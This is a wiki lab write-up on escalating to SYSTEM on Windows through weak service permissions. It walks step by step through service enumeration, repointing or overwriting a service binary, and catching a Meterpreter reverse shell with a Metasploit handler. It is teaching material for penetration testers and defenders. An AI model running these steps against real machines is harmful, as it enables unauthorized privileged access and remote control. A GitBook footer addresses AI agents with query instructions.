> For the complete documentation index, see [llms.txt](https://www.ired.team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.ired.team/offensive-security/privilege-escalation/weak-service-permissions.md). # Weak Service Permissions This quick lab covers two Windows service misconfigurations that allow an attacker to elevate their privileges: 1. A low privileged user is allowed to change service configuration - for example change the service binary the service launches when it starts 2. A low privileged user can overwrite the binary the service launches when it starts ## 1. Changing Service Configuration Let's enumerate services with `accesschk` from SysInternals and look for `SERVICE_ALL_ACCESS` or `SERVICE_CHANGE_CONFIG` as these privileges allow attackers to modify service configuration: {% code title="attacker\@victim" %} ``` \\vboxsvr\tools\accesschk.exe /accepteula -ucv "mantvydas" evilsvc or \\vboxsvr\tools\accesschk.exe /accepteula -uwcqv "Authenticated Users" * ``` {% endcode %} Below indicates that the user `mantvydas` has full access to the service: ![](/files/-LfQxQsNMbh9wtREtazf) Let's modify the service and point its binary to our malicious binary that will get us a meterpreter shell when the service is launched: {% code title="attacker\@victim" %} ``` .\sc.exe config evilsvc binpath= "c:\program.exe" ``` {% endcode %} ![](/files/-LfQxuVr05oPcMg42QwD) Let's fire up a multihandler in mfsconsole: {% code title="attacker\@kali" %} ``` msfconsole -x "use exploits/multi/handler; set lhost 10.0.0.5; set lport 443; set payload windows/meterpreter/reverse_tcp; exploit" ``` {% endcode %} ...and start the vulnerable service: {% code title="attacker\@victim" %} ``` .\sc.exe start evilsvc ``` {% endcode %} ..and enjoy the meterpreter session: ![](/files/-LfQz8uKhh0sgwvqHXHd) Note that the meterpreter session will die soon since the meterpreter binary `program.exe` that the vulnerable service `VulnSvc` kicked off, is not a compatible service binary. To save the session, migrate it to another sprocess: {% code title="attacker\@kali" %} ``` run post/windows/manage/migrate ``` {% endcode %} Even though the service failed, the session was migrated and saved: ![](/files/-LfR--yC-M0aaMjzfPO0) ## 2. Overwriting Service Binary From the first exercise, we know that our user has `SERVICE_ALL_ACCESS` for the service `evilsvc`. Let's check the service binary path: {% code title="attacker\@victim" %} ``` sc.exe qc evilsvc ``` {% endcode %} ![](/files/-LfR0BB2kCT-lS1fF_7h) Let's check file permissions of the binary c:\service.exe using a native windows tool `icals` and look for (M)odify or (F)ull permissions for `Authenticated Users` or the user you currently have a shell with: {% code title="attacker\@victim" %} ``` icacls C:\service.exe ``` {% endcode %} ![](/files/-LfR0MqaYrrcerQUvsHV) Since c:\service.exe is (M)odifiable by any authenticated user, we can move our malicious binary c:\program.exe to c:\service.exe: {% code title="attacker\@victim" %} ``` cp C:\program.exe C:\service.exe ls c:\ ``` {% endcode %} ![](/files/-LfR0_cS8E9RVeGIrZQq) ...and get the meterpreter shell once `sc start evilsvc` is executed. Note that the shell will die if we do not migrate the process same way as mentioned earlier: ![](/files/-LfR0rMgwsfchYJdGaCV) Since services usually run under `NT AUTHORITY\SYSTEM`, our malicious binary gets executed with `SYSTEM` privileges: ![](/files/-LfR3MA-AJ7pVG_uHmo5) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://www.ired.team/offensive-security/privilege-escalation/weak-service-permissions.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.